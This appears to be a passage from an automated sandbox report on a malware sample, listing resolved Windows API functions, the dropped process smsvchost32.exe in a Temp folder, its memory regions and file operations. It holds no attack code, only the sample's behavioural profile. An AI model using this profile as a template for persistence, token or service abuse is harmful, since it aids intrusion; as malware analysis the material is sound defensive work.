| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x753cdb90 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryFullProcessImageNameW, address_out = 0x765e1b70 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 50 milliseconds (0.050 seconds) |
|
2 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 |
Process #10: smsvchost32.exe
30264
154
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x934 |
| Parent PID | 0xe6c (c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
938
0x
56C
0x
614
0x
840
0x
EF0
0x
DD8
0x
EDC
0x
A54
0x
440
0x
904
0x
DB4
0x
DC0
0x
EC0
0x
F9C
0x
FB4
0x
AA8
0x
4D0
0x
8B8
0x
7CC
0x
624
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00511fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00531fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00541fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00560fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x00570fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005c2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x00626fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00610fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x00620000 | 0x00620fff | Memory Mapped File | rw |
|
|
|
|
| pagefile_0x0000000000630000 | 0x00630000 | 0x00630fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x00b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x01f5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x0205ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02070000 | 0x023a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0272ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x0276ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c46fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d70000 | 0x02d70000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02ec6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002eb0000 | 0x02eb0000 | 0x02eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ec0000 | 0x02ec0000 | 0x02ec1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f10000 | 0x02f10000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0304ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0318ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x032a6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x032cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033d0000 | 0x033d0000 | 0x033e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000033d0000 | 0x033d0000 | 0x033d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000033e0000 | 0x033e0000 | 0x037dafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037e0000 | 0x037e0000 | 0x037f6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037e0000 | 0x037e0000 | 0x037e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037f0000 | 0x037f0000 | 0x03806fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff20000 | 0x6ff32fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 16 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (628)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | type = size |
|
1 | |
| Get Info | C:\Users\All Users\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\All Users\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Default\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Default\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
